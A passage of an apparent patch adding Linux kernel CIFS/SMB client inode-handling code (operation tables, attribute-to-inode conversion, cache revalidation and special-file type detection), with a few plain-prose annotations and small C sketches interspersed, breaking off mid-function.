++		inode->i_op = &cifs_file_inode_ops;
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
++			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++				inode->i_fop = &cifs_file_direct_nobrl_ops;
++			else
++				inode->i_fop = &cifs_file_direct_ops;
++		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
++			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++				inode->i_fop = &cifs_file_strict_nobrl_ops;
++			else
++				inode->i_fop = &cifs_file_strict_ops;
++		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++			inode->i_fop = &cifs_file_nobrl_ops;
++		else { /* not direct, send byte range locks */
++			inode->i_fop = &cifs_file_ops;
++		}
++
++		/* check if server can support readahead */
++		if (cifs_sb_master_tcon(cifs_sb)->ses->server->max_read <
++				PAGE_SIZE + MAX_CIFS_HDR_SIZE)
++			inode->i_data.a_ops = &cifs_addr_ops_smallbuf;
++		else
++			inode->i_data.a_ops = &cifs_addr_ops;
++		break;
++	case S_IFDIR:
++#ifdef CONFIG_CIFS_DFS_UPCALL
++		if (IS_AUTOMOUNT(inode)) {
++			inode->i_op = &cifs_dfs_referral_inode_operations;
++		} else {
++#else /* NO DFS support, treat as a directory */
++		{
++#endif
++			inode->i_op = &cifs_dir_inode_ops;
++			inode->i_fop = &cifs_dir_ops;
++		}
++		break;
++	case S_IFLNK:
++		inode->i_op = &cifs_symlink_inode_ops;
++		break;
++	default:
++		init_special_inode(inode, inode->i_mode, inode->i_rdev);
++		break;
++	}
++}
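cifs_set_ops() above picks the inode's operation tables once, at inode initialization, from the file type and the mount flags, so the per-call I/O paths never re-branch on direct/strict/nobrl. A small userspace sketch of that select-once dispatch (flag and table names invented):

  #include <stdio.h>

  #define MNT_DIRECT (1u << 0)
  #define MNT_NOBRL  (1u << 1)

  struct fops { const char *name; };

  static const struct fops direct_ops       = { "direct" };
  static const struct fops direct_nobrl_ops = { "direct_nobrl" };
  static const struct fops default_ops      = { "default" };

  static const struct fops *pick_fops(unsigned int flags)
  {
          /* chosen once at setup; callers just use the pointer */
          if (flags & MNT_DIRECT)
                  return (flags & MNT_NOBRL) ? &direct_nobrl_ops : &direct_ops;
          return &default_ops;
  }

  int main(void)
  {
          printf("%s\n", pick_fops(MNT_DIRECT | MNT_NOBRL)->name);
          return 0;
  }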
++
++/* check inode attributes against fattr. If they don't match, tag the
++ * inode for cache invalidation
++ */
++static void
++cifs_revalidate_cache(struct inode *inode, struct cifs_fattr *fattr)
++{
++	struct cifs_fscache_inode_coherency_data cd;
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++
++	cifs_dbg(FYI, "%s: revalidating inode %llu\n",
++		 __func__, cifs_i->uniqueid);
++
++	if (inode->i_state & I_NEW) {
++		cifs_dbg(FYI, "%s: inode %llu is new\n",
++			 __func__, cifs_i->uniqueid);
++		return;
++	}
++
++	/* don't bother with revalidation if we have an oplock */
++	if (CIFS_CACHE_READ(cifs_i)) {
++		cifs_dbg(FYI, "%s: inode %llu is oplocked\n",
++			 __func__, cifs_i->uniqueid);
++		return;
++	}
++
++	 /* revalidate if mtime or size have changed */
++	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
++	if (timespec64_equal(&inode->i_mtime, &fattr->cf_mtime) &&
++	    cifs_i->server_eof == fattr->cf_eof) {
++		cifs_dbg(FYI, "%s: inode %llu is unchanged\n",
++			 __func__, cifs_i->uniqueid);
++		return;
++	}
++
++	cifs_dbg(FYI, "%s: invalidating inode %llu mapping\n",
++		 __func__, cifs_i->uniqueid);
++	set_bit(CIFS_INO_INVALID_MAPPING, &cifs_i->flags);
++	/* Invalidate fscache cookie */
++	cifs_fscache_fill_coherency(&cifs_i->netfs.inode, &cd);
++	fscache_invalidate(cifs_inode_cookie(inode), &cd, i_size_read(inode), 0);
++}
++
++/*
++ * copy nlink to the inode, unless it wasn't provided.  Provide
++ * sane values if we don't have an existing one and none was provided
++ */
++static void
++cifs_nlink_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
++{
++	/*
++	 * if we're in a situation where we can't trust what we
++	 * got from the server (readdir, some non-unix cases)
++	 * fake reasonable values
++	 */
++	if (fattr->cf_flags & CIFS_FATTR_UNKNOWN_NLINK) {
++		/* only provide fake values on a new inode */
++		if (inode->i_state & I_NEW) {
++			if (fattr->cf_cifsattrs & ATTR_DIRECTORY)
++				set_nlink(inode, 2);
++			else
++				set_nlink(inode, 1);
++		}
++		return;
++	}
++
++	/* we trust the server, so update it */
++	set_nlink(inode, fattr->cf_nlink);
++}
++
++/* populate an inode with info from a cifs_fattr struct */
++int
++cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
++{
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	if (!(inode->i_state & I_NEW) &&
++	    unlikely(inode_wrong_type(inode, fattr->cf_mode))) {
++		CIFS_I(inode)->time = 0; /* force reval */
++		return -ESTALE;
++	}
++
++	cifs_revalidate_cache(inode, fattr);
++
++	spin_lock(&inode->i_lock);
++	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
++	fattr->cf_atime = timestamp_truncate(fattr->cf_atime, inode);
++	fattr->cf_ctime = timestamp_truncate(fattr->cf_ctime, inode);
++	/* we do not want atime to be less than mtime, it broke some apps */
++	if (timespec64_compare(&fattr->cf_atime, &fattr->cf_mtime) < 0)
++		inode->i_atime = fattr->cf_mtime;
++	else
++		inode->i_atime = fattr->cf_atime;
++	inode->i_mtime = fattr->cf_mtime;
++	inode->i_ctime = fattr->cf_ctime;
++	inode->i_rdev = fattr->cf_rdev;
++	cifs_nlink_fattr_to_inode(inode, fattr);
++	inode->i_uid = fattr->cf_uid;
++	inode->i_gid = fattr->cf_gid;
++
++	/* if dynperm is set, don't clobber existing mode */
++	if (inode->i_state & I_NEW ||
++	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM))
++		inode->i_mode = fattr->cf_mode;
++
++	cifs_i->cifsAttrs = fattr->cf_cifsattrs;
++
++	if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
++		cifs_i->time = 0;
++	else
++		cifs_i->time = jiffies;
++
++	if (fattr->cf_flags & CIFS_FATTR_DELETE_PENDING)
++		set_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
++	else
++		clear_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
++
++	cifs_i->server_eof = fattr->cf_eof;
++	/*
++	 * Can't safely change the file size here if the client is writing to
++	 * it due to potential races.
++	 */
++	if (is_size_safe_to_change(cifs_i, fattr->cf_eof)) {
++		i_size_write(inode, fattr->cf_eof);
++
++		/*
++		 * i_blocks is not related to (i_size / i_blksize),
++		 * but instead 512 byte (2**9) size is required for
++		 * calculating num blocks.
++		 */
++		inode->i_blocks = (512 - 1 + fattr->cf_bytes) >> 9;
++	}
++
++	if (S_ISLNK(fattr->cf_mode)) {
++		kfree(cifs_i->symlink_target);
++		cifs_i->symlink_target = fattr->cf_symlink_target;
++		fattr->cf_symlink_target = NULL;
++	}
++	spin_unlock(&inode->i_lock);
++
++	if (fattr->cf_flags & CIFS_FATTR_DFS_REFERRAL)
++		inode->i_flags |= S_AUTOMOUNT;
++	if (inode->i_state & I_NEW)
++		cifs_set_ops(inode);
++	return 0;
++}
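One detail in cifs_fattr_to_inode() worth a worked example: i_blocks counts 512-byte units, and (512 - 1 + bytes) >> 9 is the usual add-then-shift idiom for rounding a byte count up to whole 512-byte blocks, since >> 9 divides by 2^9 = 512:

  #include <stdio.h>

  int main(void)
  {
          unsigned long long bytes[] = { 0, 1, 512, 513, 4096 };

          for (int i = 0; i < 5; i++)
                  printf("%llu bytes -> %llu blocks\n",
                         bytes[i], (512 - 1 + bytes[i]) >> 9);
          /* 0->0, 1->1, 512->1, 513->2, 4096->8 */
          return 0;
  }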
++
++void
++cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
++		return;
++
++	fattr->cf_uniqueid = iunique(sb, ROOT_I);
++}
++
++/* Fill a cifs_fattr struct with info from FILE_UNIX_BASIC_INFO. */
++void
++cifs_unix_basic_to_fattr(struct cifs_fattr *fattr, FILE_UNIX_BASIC_INFO *info,
++			 struct cifs_sb_info *cifs_sb)
++{
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_uniqueid = le64_to_cpu(info->UniqueId);
++	fattr->cf_bytes = le64_to_cpu(info->NumOfBytes);
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++
++	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastModificationTime);
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->LastStatusChange);
++	/* old POSIX extensions don't get create time */
++
++	fattr->cf_mode = le64_to_cpu(info->Permissions);
++
++	/*
++	 * Since we set the inode type below we need to mask off
++	 * to avoid strange results if bits set above.
++	 */
++	fattr->cf_mode &= ~S_IFMT;
++	switch (le32_to_cpu(info->Type)) {
++	case UNIX_FILE:
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++		break;
++	case UNIX_SYMLINK:
++		fattr->cf_mode |= S_IFLNK;
++		fattr->cf_dtype = DT_LNK;
++		break;
++	case UNIX_DIR:
++		fattr->cf_mode |= S_IFDIR;
++		fattr->cf_dtype = DT_DIR;
++		break;
++	case UNIX_CHARDEV:
++		fattr->cf_mode |= S_IFCHR;
++		fattr->cf_dtype = DT_CHR;
++		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
++				       le64_to_cpu(info->DevMinor) & MINORMASK);
++		break;
++	case UNIX_BLOCKDEV:
++		fattr->cf_mode |= S_IFBLK;
++		fattr->cf_dtype = DT_BLK;
++		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
++				       le64_to_cpu(info->DevMinor) & MINORMASK);
++		break;
++	case UNIX_FIFO:
++		fattr->cf_mode |= S_IFIFO;
++		fattr->cf_dtype = DT_FIFO;
++		break;
++	case UNIX_SOCKET:
++		fattr->cf_mode |= S_IFSOCK;
++		fattr->cf_dtype = DT_SOCK;
++		break;
++	default:
++		/* safest to call it a file if we do not know */
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++		cifs_dbg(FYI, "unknown type %d\n", le32_to_cpu(info->Type));
++		break;
++	}
++
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)) {
++		u64 id = le64_to_cpu(info->Uid);
++		if (id < ((uid_t)-1)) {
++			kuid_t uid = make_kuid(&init_user_ns, id);
++			if (uid_valid(uid))
++				fattr->cf_uid = uid;
++		}
++	}
++
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)) {
++		u64 id = le64_to_cpu(info->Gid);
++		if (id < ((gid_t)-1)) {
++			kgid_t gid = make_kgid(&init_user_ns, id);
++			if (gid_valid(gid))
++				fattr->cf_gid = gid;
++		}
++	}
++
++	fattr->cf_nlink = le64_to_cpu(info->Nlinks);
++}
++
++/*
++ * Fill a cifs_fattr struct with fake inode info.
++ *
++ * Needed to setup cifs_fattr data for the directory which is the
++ * junction to the new submount (ie to setup the fake directory
++ * which represents a DFS referral).
++ */
++static void
++cifs_create_dfs_fattr(struct cifs_fattr *fattr, struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	cifs_dbg(FYI, "creating fake fattr for DFS referral\n");
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_mode = S_IFDIR | S_IXUGO | S_IRWXU;
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++	ktime_get_coarse_real_ts64(&fattr->cf_mtime);
++	fattr->cf_atime = fattr->cf_ctime = fattr->cf_mtime;
++	fattr->cf_nlink = 2;
++	fattr->cf_flags = CIFS_FATTR_DFS_REFERRAL;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_get_file_info_unix(struct file *filp)
++{
++	int rc;
++	unsigned int xid;
++	FILE_UNIX_BASIC_INFO find_data;
++	struct cifs_fattr fattr = {};
++	struct inode *inode = file_inode(filp);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsFileInfo *cfile = filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++
++	xid = get_xid();
++
++	if (cfile->symlink_target) {
++		fattr.cf_symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++		if (!fattr.cf_symlink_target) {
++			rc = -ENOMEM;
++			goto cifs_gfiunix_out;
++		}
++	}
++
++	rc = CIFSSMBUnixQFileInfo(xid, tcon, cfile->fid.netfid, &find_data);
++	if (!rc) {
++		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
++	} else if (rc == -EREMOTE) {
++		cifs_create_dfs_fattr(&fattr, inode->i_sb);
++		rc = 0;
++	} else
++		goto cifs_gfiunix_out;
++
++	rc = cifs_fattr_to_inode(inode, &fattr);
++
++cifs_gfiunix_out:
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_get_inode_info_unix(struct inode **pinode,
++			     const unsigned char *full_path,
++			     struct super_block *sb, unsigned int xid)
++{
++	int rc;
++	FILE_UNIX_BASIC_INFO find_data;
++	struct cifs_fattr fattr;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	cifs_dbg(FYI, "Getting info on %s\n", full_path);
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	/* could have done a find first instead but this returns more info */
++	rc = CIFSSMBUnixQPathInfo(xid, tcon, full_path, &find_data,
++				  cifs_sb->local_nls, cifs_remap(cifs_sb));
++	cifs_dbg(FYI, "%s: query path info: rc = %d\n", __func__, rc);
++	cifs_put_tlink(tlink);
++
++	if (!rc) {
++		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
++	} else if (rc == -EREMOTE) {
++		cifs_create_dfs_fattr(&fattr, sb);
++		rc = 0;
++	} else {
++		return rc;
++	}
++
++	/* check for Minshall+French symlinks */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
++		int tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
++					     full_path);
++		if (tmprc)
++			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
++	}
++
++	if (S_ISLNK(fattr.cf_mode) && !fattr.cf_symlink_target) {
++		if (!server->ops->query_symlink)
++			return -EOPNOTSUPP;
++		rc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
++						&fattr.cf_symlink_target, false);
++		if (rc) {
++			cifs_dbg(FYI, "%s: query_symlink: %d\n", __func__, rc);
++			goto cgiiu_exit;
++		}
++	}
++
++	if (*pinode == NULL) {
++		/* get new inode */
++		cifs_fill_uniqueid(sb, &fattr);
++		*pinode = cifs_iget(sb, &fattr);
++		if (!*pinode)
++			rc = -ENOMEM;
++	} else {
++		/* we already have inode, update it */
++
++		/* if uniqueid is different, return error */
++		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
++		    CIFS_I(*pinode)->uniqueid != fattr.cf_uniqueid)) {
++			CIFS_I(*pinode)->time = 0; /* force reval */
++			rc = -ESTALE;
++			goto cgiiu_exit;
++		}
++
++		/* if filetype is different, return error */
++		rc = cifs_fattr_to_inode(*pinode, &fattr);
++	}
++
++cgiiu_exit:
++	kfree(fattr.cf_symlink_target);
++	return rc;
++}
++#else
++int cifs_get_inode_info_unix(struct inode **pinode,
++			     const unsigned char *full_path,
++			     struct super_block *sb, unsigned int xid)
++{
++	return -EOPNOTSUPP;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
++	      struct cifs_sb_info *cifs_sb, unsigned int xid)
++{
++	int rc;
++	__u32 oplock;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	char buf[24];
++	unsigned int bytes_read;
++	char *pbuf;
++	int buf_type = CIFS_NO_BUFFER;
++
++	pbuf = buf;
++
++	fattr->cf_mode &= ~S_IFMT;
++
++	if (fattr->cf_eof == 0) {
++		fattr->cf_mode |= S_IFIFO;
++		fattr->cf_dtype = DT_FIFO;
++		return 0;
++	} else if (fattr->cf_eof < 8) {
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++		return -EINVAL;	 /* EOPNOTSUPP? */
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, NULL);
++	if (rc) {
++		cifs_dbg(FYI, "check sfu type of %s, open rc = %d\n", path, rc);
++		cifs_put_tlink(tlink);
++		return rc;
++	}
++
++	/* Read header */
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = 24;
++
++	rc = tcon->ses->server->ops->sync_read(xid, &fid, &io_parms,
++					&bytes_read, &pbuf, &buf_type);
++	if ((rc == 0) && (bytes_read >= 8)) {
++		if (memcmp("IntxBLK", pbuf, 8) == 0) {
++			cifs_dbg(FYI, "Block device\n");
++			fattr->cf_mode |= S_IFBLK;
++			fattr->cf_dtype = DT_BLK;
++			if (bytes_read == 24) {
++				/* we have enough to decode dev num */
++				__u64 mjr; /* major */
++				__u64 mnr; /* minor */
++				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
++				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
++				fattr->cf_rdev = MKDEV(mjr, mnr);
++			}
++		} else if (memcmp("IntxCHR", pbuf, 8) == 0) {
++			cifs_dbg(FYI, "Char device\n");
++			fattr->cf_mode |= S_IFCHR;
++			fattr->cf_dtype = DT_CHR;
++			if (bytes_read == 24) {
++				/* we have enough to decode dev num */
++				__u64 mjr; /* major */
++				__u64 mnr; /* minor */
++				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
++				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
++				fattr->cf_rdev = MKDEV(mjr, mnr);
++			}
++		} else if (memcmp("IntxLNK", pbuf, 7) == 0) {
++			cifs_dbg(FYI, "Symlink\n");
++			fattr->cf_mode |= S_IFLNK;
++			fattr->cf_dtype = DT_LNK;
++		} else {
++			fattr->cf_mode |= S_IFREG; /* file? */
++			fattr->cf_dtype = DT_REG;
++			rc = -EOPNOTSUPP;
++		}
++	} else {
++		fattr->cf_mode |= S_IFREG; /* then it is a file */
++		fattr->cf_dtype = DT_REG;
++		rc = -EOPNOTSUPP; /* or some unknown SFU type */
++	}
++
++	tcon->ses->server->ops->close(xid, tcon, &fid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
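The SFU probe above reads a 24-byte header: the first 8 bytes are a magic tag ("IntxBLK", "IntxCHR", or "IntxLNK", with the NUL included in the 8-byte comparison for the first two), and for device nodes the next 16 bytes hold little-endian 64-bit major and minor numbers. A standalone sketch of that decode (assuming a little-endian host so a bare memcpy suffices):

  #include <stdint.h>
  #include <stdio.h>
  #include <string.h>

  int main(void)
  {
          unsigned char hdr[24] = "IntxBLK";   /* bytes 8..23 default to 0 */
          uint64_t mjr, mnr;

          hdr[8]  = 8;   /* major 8 ... */
          hdr[16] = 1;   /* ... minor 1, both little-endian on the wire */

          if (memcmp(hdr, "IntxBLK", 8) == 0) {
                  memcpy(&mjr, hdr + 8, 8);    /* LE host assumed, see above */
                  memcpy(&mnr, hdr + 16, 8);
                  printf("block device %llu:%llu\n",
                         (unsigned long long)mjr, (unsigned long long)mnr);
          }
          return 0;
  }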
++
++#define SFBITS_MASK (S_ISVTX | S_ISGID | S_ISUID)  /* SETFILEBITS valid bits */
++
++/*
++ * Fetch mode bits as provided by SFU.
++ *
++ * FIXME: Doesn't this clobber the type bit we got from cifs_sfu_type ?
++ */
++static int cifs_sfu_mode(struct cifs_fattr *fattr, const unsigned char *path,
++			 struct cifs_sb_info *cifs_sb, unsigned int xid)
++{
++#ifdef CONFIG_CIFS_XATTR
++	ssize_t rc;
++	char ea_value[4];
++	__u32 mode;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	if (tcon->ses->server->ops->query_all_EAs == NULL) {
++		cifs_put_tlink(tlink);
++		return -EOPNOTSUPP;
++	}
++
++	rc = tcon->ses->server->ops->query_all_EAs(xid, tcon, path,
++			"SETFILEBITS", ea_value, 4 /* size of buf */,
++			cifs_sb);
++	cifs_put_tlink(tlink);
++	if (rc < 0)
++		return (int)rc;
++	else if (rc > 3) {
++		mode = le32_to_cpu(*((__le32 *)ea_value));
++		fattr->cf_mode &= ~SFBITS_MASK;
++		cifs_dbg(FYI, "special bits 0%o org mode 0%o\n",
++			 mode, fattr->cf_mode);
++		fattr->cf_mode = (mode & SFBITS_MASK) | fattr->cf_mode;
++		cifs_dbg(FYI, "special mode bits 0%o\n", mode);
++	}
++
++	return 0;
++#else
++	return -EOPNOTSUPP;
++#endif
++}
++
++/* Fill a cifs_fattr struct with info from POSIX info struct */
++static void smb311_posix_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
++				       struct super_block *sb, bool adjust_tz, bool symlink)
++{
++	struct smb311_posix_qinfo *info = &data->posix_fi;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++
++	memset(fattr, 0, sizeof(*fattr));
++
++	/* no fattr->flags to set */
++	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
++	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
++
++	if (info->LastAccessTime)
++		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	else
++		ktime_get_coarse_real_ts64(&fattr->cf_atime);
++
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
++
++	if (adjust_tz) {
++		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
++		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
++	}
++
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
++	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
++
++	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
++	fattr->cf_mode = (umode_t) le32_to_cpu(info->Mode);
++	/* The srv fs device id is overridden on network mount so setting rdev isn't needed here */
++	/* fattr->cf_rdev = le32_to_cpu(info->DeviceId); */
++
++	if (symlink) {
++		fattr->cf_mode |= S_IFLNK;
++		fattr->cf_dtype = DT_LNK;
++		fattr->cf_symlink_target = data->symlink_target;
++		data->symlink_target = NULL;
++	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode |= S_IFDIR;
++		fattr->cf_dtype = DT_DIR;
++	} else { /* file */
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++	}
++	/* else if reparse point ... TODO: add support for FIFO and blk dev; special file types */
++
++	fattr->cf_uid = cifs_sb->ctx->linux_uid; /* TODO: map uid and gid from SID */
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++
++	cifs_dbg(FYI, "POSIX query info: mode 0x%x uniqueid 0x%llx nlink %d\n",
++		fattr->cf_mode, fattr->cf_uniqueid, fattr->cf_nlink);
++}
++
++static void cifs_open_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
++				    struct super_block *sb, bool adjust_tz, bool symlink,
++				    u32 reparse_tag)
++{
++	struct smb2_file_all_info *info = &data->fi;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_cifsattrs = le32_to_cpu(info->Attributes);
++	if (info->DeletePending)
++		fattr->cf_flags |= CIFS_FATTR_DELETE_PENDING;
++
++	if (info->LastAccessTime)
++		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	else
++		ktime_get_coarse_real_ts64(&fattr->cf_atime);
++
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
++
++	if (adjust_tz) {
++		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
++		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
++	}
++
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
++	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
++
++	fattr->cf_nlink = le32_to_cpu(info->NumberOfLinks);
++	if (reparse_tag == IO_REPARSE_TAG_LX_SYMLINK) {
++		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_LNK;
++	} else if (reparse_tag == IO_REPARSE_TAG_LX_FIFO) {
++		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_FIFO;
++	} else if (reparse_tag == IO_REPARSE_TAG_AF_UNIX) {
++		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_SOCK;
++	} else if (reparse_tag == IO_REPARSE_TAG_LX_CHR) {
++		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_CHR;
++	} else if (reparse_tag == IO_REPARSE_TAG_LX_BLK) {
++		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_BLK;
++	} else if (symlink || reparse_tag == IO_REPARSE_TAG_SYMLINK ||
++		   reparse_tag == IO_REPARSE_TAG_NFS) {
++		fattr->cf_mode = S_IFLNK;
++		fattr->cf_dtype = DT_LNK;
++	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
++		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
++		fattr->cf_dtype = DT_DIR;
++		/*
++		 * Server can return wrong NumberOfLinks value for directories
++		 * when Unix extensions are disabled - fake it.
++		 */
++		if (!tcon->unix_ext)
++			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
++	} else {
++		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
++		fattr->cf_dtype = DT_REG;
++
++		/* clear write bits if ATTR_READONLY is set */
++		if (fattr->cf_cifsattrs & ATTR_READONLY)
++			fattr->cf_mode &= ~(S_IWUGO);
++
++		/*
++		 * Don't accept zero nlink from non-unix servers unless
++		 * delete is pending.  Instead mark it as unknown.
++		 */
++		if ((fattr->cf_nlink < 1) && !tcon->unix_ext &&
++		    !info->DeletePending) {
++			cifs_dbg(VFS, "bogus file nlink value %u\n",
++				 fattr->cf_nlink);
++			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
++		}
++	}
++
++	if (S_ISLNK(fattr->cf_mode)) {
++		fattr->cf_symlink_target = data->symlink_target;
++		data->symlink_target = NULL;
++	}
++
++	fattr->cf_uid = cifs_sb->ctx->linux_uid;
++	fattr->cf_gid = cifs_sb->ctx->linux_gid;
++}
++
++static int
++cifs_get_file_info(struct file *filp)
++{
++	int rc;
++	unsigned int xid;
++	struct cifs_open_info_data data = {};
++	struct cifs_fattr fattr;
++	struct inode *inode = file_inode(filp);
++	struct cifsFileInfo *cfile = filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	bool symlink = false;
++	u32 tag = 0;
++
++	if (!server->ops->query_file_info)
++		return -ENOSYS;
++
++	xid = get_xid();
++	rc = server->ops->query_file_info(xid, tcon, cfile, &data);
++	switch (rc) {
++	case 0:
++		/* TODO: add support to query reparse tag */
++		if (data.symlink_target) {
++			symlink = true;
++			tag = IO_REPARSE_TAG_SYMLINK;
++		}
++		cifs_open_info_to_fattr(&fattr, &data, inode->i_sb, false, symlink, tag);
++		break;
++	case -EREMOTE:
++		cifs_create_dfs_fattr(&fattr, inode->i_sb);
++		rc = 0;
++		break;
